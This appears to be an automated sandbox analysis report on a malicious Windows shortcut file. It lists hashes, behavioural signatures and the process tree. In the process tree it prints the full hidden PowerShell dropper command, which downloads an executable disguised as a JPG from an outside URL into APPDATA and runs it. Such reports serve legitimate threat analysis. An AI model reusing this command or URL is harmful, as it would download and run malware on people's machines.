Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23/05/2024, 12:52
Static task
static1
Behavioral task
behavioral1
Sample
mpf248001.lnk
Resource
win7-20240221-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
mpf248001.lnk
Resource
win10v2004-20240508-en
7 signatures
150 seconds
General
-
Target
mpf248001.lnk
-
Size
2KB
-
MD5
77974f95d0161538e10b02e181f43ca5
-
SHA1
9a140197bd19de7a5aca70286780d81c9d33a709
-
SHA256
4de917051a4f97310df4d0674dfd2d8fb019bb033af88d9521e2ae1f30cd8936
-
SHA512
2cfac448a050a3c00c8f4a80c96e2a0aba5b5526d7c420a63ed1b1a32bc0202578bf86a960a918490340864a33d54fafd8f887c41a762724dbcb959266f3f6ad
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://muonlinebr.com.br/imagens.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2508 powershell.exe 6 2508 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2508 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2508 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1720 wrote to memory of 2508 1720 cmd.exe 29 PID 1720 wrote to memory of 2508 1720 cmd.exe 29 PID 1720 wrote to memory of 2508 1720 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\mpf248001.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command "(New-Object System.Net.WebClient).DownloadFile(\"https://muonlinebr.com.br/imagens.jpg\",\"$env:APPDATA\king.exe\")";[Diagnostics.Process]::Start(\"$env:APPDATA\king.exe\")2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-